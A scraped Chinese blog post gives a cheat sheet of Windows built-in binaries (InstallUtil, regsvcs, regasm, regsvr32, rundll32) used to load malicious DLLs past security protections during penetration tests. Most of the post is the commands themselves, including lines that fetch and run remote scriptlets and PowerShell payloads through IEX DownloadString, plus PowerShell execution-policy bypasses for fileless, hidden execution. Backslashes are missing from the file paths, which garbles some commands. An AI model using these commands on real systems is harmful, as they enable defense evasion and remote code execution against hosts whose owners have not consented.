zoukankan      html  css  js  c++  java
  • jQuery火箭图标返回顶部代码

    在渗透测试过程中,意图使目标主机执行恶意 DLL ,达到一定的目的。但在这个过程中总是会遇到各种各种的安全防护,下面通过系统自带的程序来绕过安全防护,加载我们自己想要执行的 DLL 文件:

    #InstallUtil.exe
    #x86
    C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
    #x64
    C:WindowsMicrosoft.NETFramework64v4.0.3031964InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
    
    #regsvcs.exe
    #x86
    C:WindowsMicrosoft.NETFrameworkv4.0.30319
    egsvcs.exe AllTheThings.dll
    #x64
    C:WindowsMicrosoft.NETFramework64v4.0.30319
    egsvcs.exe AllTheThings.dll
    
    #regasm.exe
    #x86
    C:WindowsMicrosoft.NETFrameworkv4.0.30319
    egasm.exe /U AllTheThings.dll
    #x64
    C:WindowsMicrosoft.NETFramework64v4.0.30319
    egasm.exe /U AllTheThings.dll
    
    #regsvr32
    #x86
    regsvr32 /s /u AllTheThings.dll
    #x64
    regsvr32 /s AllTheThings.dll
    
    #加载远程脚本执行
    regsvr32 /s /u /i:http://ip.xyz/file.sct scrobj.dll
    regsvr32 /u /n /s /i:\192.168.164.1folderpayload.sct scrobj.dll
    
    #rundll32
    rundll32 AllTheThings.dll,EntryPoint
    rundll32 javascript:"..mshtml,RunHTMLApplication";o=GetObject("script:http://ip/payload.sct");window.close();
    rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
    rundll32.exe javascript:"..mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject("WScript.Shell");w.run("calc");window.close()");
    rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
    

    顺便再补充一下绕过 PowerShell 执行策略的命令:

    #本地文件执行
    powershell.exe -ExecutionPolicy bypass -File Payload.ps1
    powershell.exe exec bypass -Command "& {Import-Module C:Payload.ps1;Invoke-AllChecks}"
    
    #远程无文件执行
    powershell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet.WebClient).DownloadString("http://192.168.1.1/Payload.ps1");[payload的参数]  (去除方括号)
    
    #如果本地的 powershell 命令参数进行了限制,还可以尝试使用 ps_encoder.py 脚本将编码转为 base64 格式
    
    forfiles /p %COMSPEC:~0,19% /s /c "@file -noe" /m po*l.*e
    

  • 相关阅读:
    SpringBoot最新教程IDEA版【狂神说Java系列】
    Mybatis最新完整教程IDEA版【通俗易懂2019.11月】
    freemarker 数字格式化(金额格式化)
    idea皮肤插件
    Spring Security 自定义表单登录页
    Spring Security 用户配置
    Spring Security 初体验
    Tomcat 部署 Spring Boot工程
    服务器安装Ngnix
    java读取配置文件
  • 原文地址:https://www.cnblogs.com/-mo-/p/12670053.html
Copyright © 2011-2022 走看看